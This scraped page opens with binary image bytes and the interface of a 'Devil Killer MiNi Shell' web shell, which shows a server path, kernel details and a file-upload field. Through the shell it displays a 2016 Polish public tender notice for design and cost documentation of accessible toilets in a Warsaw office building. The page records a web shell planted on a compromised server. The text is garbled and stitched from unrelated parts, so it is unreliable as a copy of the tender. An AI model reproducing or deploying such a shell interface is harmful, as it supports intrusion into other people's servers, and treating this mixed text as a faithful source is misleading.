JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160418/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160418/95016-N-2016.html

<p class="kh_header"><b>Warszawa: Opracowanie dokumentacji projektowej i kosztorysowej architektonicznej przebudowy pomieszczeń sanitarnych pod kątem przystosowania dla osób niepełnosprawnych w budynku przy ul. Wiśniowej 35 w Warszawie.</b><br>
<b>Numer ogłoszenia: 95016 - 2016; data zamieszczenia: 18.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarowania Nieruchomościami w dzielnicy Mokotów m.st. Warszawy , ul. Irysowa 19, 02-660 Warszawa, woj. mazowieckie, tel. 022 5493727, 5493737, faks 022 5493737.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgnmokotow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej i kosztorysowej architektonicznej przebudowy pomieszczeń sanitarnych pod kątem przystosowania dla osób niepełnosprawnych w budynku przy ul. Wiśniowej 35 w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie dokumentacji projektowej i
    kosztorysowej, na opracowanie dokumentacji projektowej i kosztorysowej 
    architektonicznej przebudowy pomieszczeń sanitarnych pod kątem przystosowania dla osób niepełnosprawnych w budynku przy ul. Wiśniowej 35 w Warszawie, zgodnie z założeniami projektowymi i kosztorysowymi,   przedstawionymi pkt 3.1.1. SIWZ, stanowiącymi również załącznik nr 3 do Rozdziału III SIWZ - istotnych postanowień umowy.
    1.1. Opis przedmiotu zamówienia wg założeń projektowych i   kosztorysowych   stanowiących załącznik nr 3 do Rozdziału III SIWZ  istotnych postanowień umowy cyt.: ZAŁOŻENIA PROJEKTOWE I KOSZTORYSOWE
Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowej architektonicznej przebudowy pomieszczeń sanitarnych pod kątem przystosowania dla osób niepełnosprawnych w budynku biurowym przy ul. Wiśniowej 35 
Podstawowe dane o obiekcie:
-  Kubatura budynku -                  2860   m3
-  Kubatura pomieszczeń podlegających przebudowie : sanitarne             - 14,96 m3
                                                                                         pokój biurowy   -    7,48 m3
Budynek  wybudowany w technologii tradycyjnej,  ściany murowane z cegły, posiada dwie   kondygnacje naziemne i jedną kondygnację  podziemną.  
Pomieszczenie sanitarne do przebudowy znajduje się na I-szej kondygnacji,  składa się                      z dwóch kabin i przedsionka . W kabinach zamontowane są po jednej misce sedesowej.                 W przedsionku zamontowane są: umywalka i zlewozmywak jednokomorowy. Kabiny posiadają wentylację grawitacyjną. Pomieszczenie sanitarne sąsiaduje z pomieszczeniem biurowym, którego część powierzchni może być wykorzystana przy adaptacji pomieszczenia wc. 
Pomieszczenie  sanitarne wyposażone jest w instalacje centralnego ogrzewania z sieci miejskiej, instalację elektryczną, wodociągowo - kanalizacyjną. Woda ciepła pozyskiwania jest z bojlera elektrycznego zamontowanego w piwnicy. 

ZAŁOŻENIA PROJEKTOWE
Informacje i wytyczne szczegółowe:
a)	Sporządzić  inwentaryzację stanu  istniejącego obejmującą rzut, przekroje. Kanały wentylacyjne i piony kanalizacyjne nanieść zgodnie ze stanem  istniejącym. 
Preferowane jest pozostawienie wentylacji grawitacyjnej dla sanitariatów 
znajdujących się w piwnicy pod adaptowanym wc na parterze. 
W adaptowanym pomieszczeniu na parterze i w sanitariatach znajdujących się w 
piwnicy    nie  przewidujemy wentylacji mechanicznej.
b)	Przy projektowaniu  pomieszczenia oprócz sanitariatu dla niepełnosprawnych zaprojektować sanitariat ogólnodostępny z oddzielnym wejściem. 
c)	Prace rozbiórkowe i adaptacyjne wykonać  w zakresie pozwalającym spełnić  obowiązujące wymagania sanitarne. 
d)	Wzmocnienia rozbieranych kominów oraz nadproża zaprojektować w pełnym zakresie, w razie potrzeby z detalami. 
e)	Sporządzić w skali 1:20 rysunki obrazujące detale rozwiązań  naruszanych  elementów konstrukcyjnych. 
f)	Na rysunkach pokazujących urządzenia dla niepełnosprawnych  nanieść wszystkie wymiary konieczne do ich montażu. 
g)	Przy aranżacji pomieszczenia uwzględnić standardowe wyposażenie przy jednoczesnym uwzględnieniu wszystkich wytycznych obowiązujących przy projektowaniu pomieszczeń sanitarnych dla niepełnosprawnych. 
h)	Uzgodnić z DOM Madalińskiego projekt na etapie koncepcji .  
i)	Dokonać uzgodnień pod względem wymagań higienicznych i zdrowotnych oraz zgodności z przepisami bezpieczeństwa i higieny pracy. 

Zakres zamawianego opracowania:
1. Dokumentacje projektowe muszą zawierać:
    a) Projekt budowlany   w branży budowlanej
    b) Przedmiary robót dla potrzeb sporządzenia kosztorysu ofertowego.
    c) Informację BIOZ

2.  Specyfikacje techniczne wykonania i odbioru robót budowlanych.
3. Kosztorys inwestorski przebudowy pomieszczenia sanitarnego w robotach budowlanych
                  
Forma opracowania dokumentacji projektowych:
a)	DOKUMENTACJA  PROJEKTOWA  w branży budowlanej musi  spełniać wymagania określone w rozporządzeniach: Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie  szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 462 z 2012 r.), oraz Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jedn. Dz. U. z 2013, nr 1129
b)	 Projekt budowlany w branży budowlanej  przebudowy pomieszczeń sanitarnych  pod kątem przystosowania dla osób niepełnosprawnych opracować  należy w 5 egzemplarzach w wersji papierowej oraz w wersji elektronicznej z pełnymi uzgodnieniami. Rysunki detali zostaną wykonane w skali 1:20. Wersja elektroniczna powinna być zapisana na nośniku elektronicznym (płyta CD), preferowany jest zapis w formacie z rozszerzeniem pdf.
c)	Każdy egzemplarz dokumentacji projektowej  budowlanej powinien być trwale oprawiony.
d)	Dokumentacja nie może zawierać żadnych materiałów reklamowych  producentów materiałów budowlanych itp. oraz żadnych reklam.
e)	Projektant zobowiązany jest do uzyskania własnym kosztem i staraniem wszelkich niezbędnych  dla prawidłowej realizacji zamówienia, koniecznych do wykonania projektu, materiałów i uzgodnień z jednostkami zewnętrznymi oraz materiałów wyjściowych np. mapy do celów projektowych itp.

Forma opracowania specyfikacji technicznej wykonania i odbioru robót:
SPECYFIKACJA TECHNICZNA wykonania i odbioru robót budowlanych musi być wykonana zgodnie z wymaganiami zawartymi w rozporządzeniu Ministra   Infrastruktury z dnia 2 września 2004 r. w  sprawie  szczegółowego  zakresu  i  formy  dokumentacji  projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno -użytkowego  (tekst jedn. Dz. U. z 2013, nr 1129),  w  2 egz.  oraz  w  wersji elektronicznej, wersja elektroniczna powinna być zapisana na nośniku elektronicznym (płyta CD), preferowany jest zapis w formacie z rozszerzeniem doc.

ZAŁOŻENIA KOSZTORYSOWE
Forma opracowania kosztorysów inwestorskich:

a)	KOSZTORYS INWESTORSKI - budowlany należy wykonać w dwóch egzemplarzach oraz w wersji elektronicznej, (za pomocą programu kosztorysowego NORMA na płycie CD) z rozszerzeniem ATH. Kosztorysy inwestorskie muszą być wykonane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robot budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130 z 2004r.poz. 1389).
b)	Kosztorys inwestorski  budowlany wykonać na podstawie sporządzonego przedmiaru stanowiącego część dokumentacji projektowej, metodą szczegółową w oparciu o kosztorysowe normy nakładów rzeczowych określone w katalogach KNR wydanych przez Ministra Gospodarki Przestrzennej i Budownictwa oraz norm y zakładowe ZGN, a w przypadku braku w nich odpowiednich nakładów rzeczowych należy zastosować katalogi  KNR-W wydane przez WACETOB. W przypadku braku odpowiednich pozycji również w tych katalogach  (lub możliwości zastosowania analogii do nich) można wykorzystać inne dostępne na rynku  katalogi norm albo wykonać kalkulację indywidualną po zaakceptowaniu przez Zamawiającego tj. inspektora nadzoru i Kierownika DOM, 
c)	W kalkulacji szczegółowej cen jednostkowych należy przyjąć  następujące ceny  czynników  produkcji oraz wskaźniki narzutów:
- stawkę robocizny kosztorysowej R - jako średnią dla miasta Warszawy stawkę za jedną roboczogodzinę w branży budowlanej publikowaną w wydawnictwach SEKOCENBUD BCR - wydanie aktualne dla daty sporządzenia dokumentacji projektowej i kosztorysowej.
- ceny jednostkowe materiałów M - jako średnie wraz z kosztami zakupu ceny materiałów, publikowane w wydawnictwach SEKOCENBUD Informacjach o cenach czynników produkcji RMS (IMB) wydanie aktualne dla daty sporządzenia dokumentacji projektowej i kosztorysowej, oraz ceny materiałów budowlanych opracowanych  przez wydawnictwo  SEKOCENBUD na zamówienie ZGN Mokotów.
- ceny jednostkowe pracy sprzętu S - jako średnie dla miasta Warszawy ceny pracy sprzętu, publikowane w wydawnictwach SEKOCENBUD BCR informacja o cenach czynników  produkcji RMS lub IRS wydanie aktualne dla daty sporządzenia dokumentacji  projektowej i kosztorysowej,
- wskaźnik narzutu kosztów pośrednich Wkp - jako średni dla miasta Warszawy wskaźnik w danej branży, publikowany w wydawnictwach SEKOCENBUD BCR - wydanie aktualne dla daty sporządzenia dokumentacji projektowej i kosztorysowej. Koszty pośrednie  Kp należy liczyć od (R + S),
- wskaźnik narzutu zysku Wz - jako średni dla miasta Warszawy wskaźnik           w danej branży, publikowany w wydawnictwach SEKOCENBUD BCR - wydanie aktualne dla daty sporządzenia dokumentacji projektowej i kosztorysowej. Zysk Z należy  liczyć od (R+S+Kp),
- Kosztorysy oraz przedmiary robót powinny obejmować pełen zakres robót niezbędny do realizacji zamówienia.
- Do kosztorysu inwestorskiego  należy dołączyć: zbiorcze zestawienie wartości cen materiałów wraz z kosztami zakupów, zestawienie wartości cen pracy sprzętu bez narzutów i zestawienie wartości robocizny bez narzutów.
- Każdy egzemplarz kosztorysu inwestorskiego budowlanego powinien być trwale oprawiony.
    2. Budynek jest administrowany przez ZGN Mokotów i znajduje się na    terenie DOM Madalińskiego, ul. Wiśniowa 35, Warszawa.
   3.  Szczegółowe określenie zakresu prac projektowo-kosztorysowych, o których mowa 
         w pkt 3.1. siwz zawierają założenia projektowe i kosztorysowe, stanowiące 
         załącznik nr 3 do  III Rozdziału SIWZ - istotnych postanowień umowy. 
              Przy opracowaniu projektu należy dążyć do minimalizacji kosztów robót 
              wykonanych na podstawie projektu.    
    4. Jednostka projektowa zobowiązana jest do pełnienia bezpłatnie nadzoru autorskiego zgodnie z obowiązującymi w tym zakresie przepisami prawa w czasie wykonywania robót na podstawie tej dokumentacji. 
   5. Wykonawca jest zobowiązany do przeniesienia praw autorskich na Zamawiającego.
   6. Czynności, o których mowa w pkt. 3.1. - 3.2. specyfikacji mają być wykonane zgodnie z:
       6.1. warunkami wynikającymi z przepisów technicznych i Prawa Budowlanego, 
       6.2. wymogami wynikającymi z Polskich Norm, w sposób czytelny i jednoznaczny z podaniem legendy indywidualnych oznaczeń graficznych,
       6.3. zasadami rzetelnej wiedzy technicznej i sztuką budowlaną,
       6.4. założeniami projektowymi i kosztorysowymi do wykonania dokumentacji   
                  projektowo - kosztorysowej, stanowiącymi załącznik nr 3 do III Rozdziału
                  specyfikacji istotnych warunków zamówienia - istotnych postanowień umowy,
       6.5. warunkami wynikającymi z Istotnych postanowień umowy stanowiących Rozdział III specyfikacji istotnych warunków zamówienia,
       6.6.  postanowieniami ustawy Prawo zamówień publicznych. 
     7. Kosztorys oraz przedmiar  robót powinien obejmować pełen zakres robót 
       niezbędny  do realizacji zamówienia. 
 8. W przypadku wystąpienia wad ukrytych w dokumentacji, których nie ujawniono 
     w  czasie jej odbioru, Jednostka Projektowa zobowiązana będzie nieodpłatnie do naniesienia poprawek i uzupełnień w terminie 3-ch dni od daty zawiadomienia.                                                                                  
9. Wykonawca, przy realizacji zamówienia, zobowiązany jest do uzyskania dostępu do pomieszczeń we własnym zakresie.
10. Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2013 r., poz. 1409 z  późn. zm.).
11. Szczegółowy zakres obowiązków Wykonawcy zawarty jest w § 1 istotnych postanowień umowy, które stanowią Rozdział III do niniejszej specyfikacji.
      11.1. Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień 
                umowy o ile  warunkiem wprowadzenia takich zmian będą między innymi 
                okoliczności, których nie można było przewidzieć w chwili zawarcia umowy 
                lub zmiany te będą korzystne dla Zamawiającego. Zamawiający dopuszcza 
                możliwość zmiany umowy w szczególności w następujących przypadkach:
    a) zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia    
    umowy wraz ze skutkami takiej zmiany regulacji prawnych;
    b) ograniczenia środków budżetowych na realizację Przedmiotu niniejszej 
    umowy;
    c) zmiany zakresu rzeczowego i finansowego;
                d)  zmiany osób uczestniczących w realizacji Przedmiotu niniejszej umowy;
          e) powierzenia Podwykonawcy wykonania części lub całości przedmiotu 
           zamówienia lub zmiany Podwykonawców w sytuacji, gdy z przyczyn, których 
           nie można było przewidzieć w chwili zawarcia umowy z Podwykonawcą, 
           koniecznym będzie dla prawidłowego wykonania umowy posłużenie się 
           przez Wykonawcę nowym Podwykonawcą, który będzie realizował część lub 
           cały zakres powierzony uprzednio innym Podwykonawcom. Jeżeli zmiana 
           albo rezygnacja z Podwykonawcy dotyczy podmiotu, na którego zasoby
           Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b
           Ustawy pzp, w celu wykazania spełniania warunków udziału w 
           postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp, Wykonawca jest 
           obowiązany wykazać Zamawiającemu, iż proponowany inny Podwykonawca 
           lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż 
           wymagany w trakcie postępowania o udzielenie zamówienia będącego 
           przedmiotem zamówienia;
                 f)zmiany terminu realizacji przedmiotu umowy w następstwie 
                 wydłużających/wykraczających poza ustawowe terminy procedur 
                 administracyjnych oraz innych terminów spraw urzędowych, mających 
                 wpływ na termin realizacji przedmiotu umowy.
      11.2. Zmiana umowy wymaga sporządzenia aneksu w formie pisemnej pod 
                     rygorem nieważności.
      11.3. Wynagrodzenie ostateczne - ryczałt - za wykonany pełen zakres prac - 
                     będzie obejmować łącznie wynagrodzenie podstawowe, podatek VAT oraz 
                     uzyskane przez Wykonawcę własnym kosztem i staraniem wszelkie 
                     niezbędne materiały, uzgodnienia.
12. Wymagania dotyczące gwarancji : 
          Zamawiający wymaga udzielenia gwarancji na wykonaną dokumentację 
          projektową i kosztorysową do czasu wygaśnięcia odpowiedzialności Wykonawcy 
          robót z tytułu gwarancji i rękojmi na roboty wykonane na podstawie opracowanej 
          dokumentacji. Warunki gwarancji zawierają Istotne postanowienia umowy  
          stanowiące Rozdział III specyfikacji istotnych warunków zamówienia.    
13. Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania
        zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający  przewiduje możliwość udzielenia zamówień uzupełniających
     stanowiących nie więcej niż 50 % wartości zamówienia podstawowego, o których 
     mowa w art. 67 ust. 1 pkt  6 ustawy z dnia 29 stycznia 2004r. Prawo zamówień 
     publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
  na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. 
            Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2015 r., poz. 2164), a 
            także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w 
            ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
     Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o 
     spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do 
     wzoru formularza oferty (pkt. 9.2.1. siwz).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>. W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
  na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. 
            Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2015 r., poz. 2164), a 
            także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w 
            ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
     Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o 
     spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do 
     wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie 
     spełniania warunków w zakresie wskazanym poniżej:
1.Wykonawca musi wykazać, że posiada wiedzę i doświadczenie w zakresie 
           realizacji usług stanowiących przedmiot zamówienia, tj. musi wykazać, że  
           w okresie ostatnich trzech lat przed upływem terminu składania ofert, a 
           jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 
           wykonał, a w przypadku świadczeń okresowych lub ciągłych również 
           wykonuje, co najmniej 3 usługi polegające na wykonaniu dokumentacji 
            projektowo-kosztorysowej odpowiadającej przedmiotowi zamówienia. 
                        Spełnienie w/w  warunku Zamawiający oceniał będzie na podstawie 
                        załączonego do oferty wykazu wykonanych głównych usług, określonych 
                        w pkt 9.2.2 SIWZ, sporządzonego wg wzoru stanowiącego załącznik nr 4
                        do formularza oferty i załączonych dowodów, określonych w pkt. 9.2.6.  
                        SIWZ  potwierdzających, że wymienione w nim usługi zostały wykonane w 
                        sposób należyty lub są wykonywane należycie.
        2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
  osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi  stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić   Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji   zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie   podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na potrzeby wykonaniu zamówienia, w formie oryginałów. 
              Zamawiający wymaga aby składany dokument/dokumenty dotyczyły w 
              szczególności:
              - zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację       
 wskazującą, który konkretny zasób jest udostępniany. W przypadku  udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku  udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo itp.). W przypadku udostępnienia potencjału technicznego należy wskazać przekazanie do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia  zdolności finansowych/  przeniesienie własności pieniędzy lub pozostawienie do dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej   odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.
   - sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy   
      wykonywaniu zamówienia,
- charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem, 
- zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,
-zobowiązanie innego podmiotu do ponoszenia solidarnej odpowiedzialności wraz z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia zasobów, do udostępnienia których się zobowiązał, chyba, że za nieudostępnienie zasobów nie ponosi winy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
  na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. 
            Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2015 r., poz. 2164), a 
            także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w 
            ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
     Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o 
     spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do 
     wzoru formularza oferty (pkt. 9.2.1. siwz).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
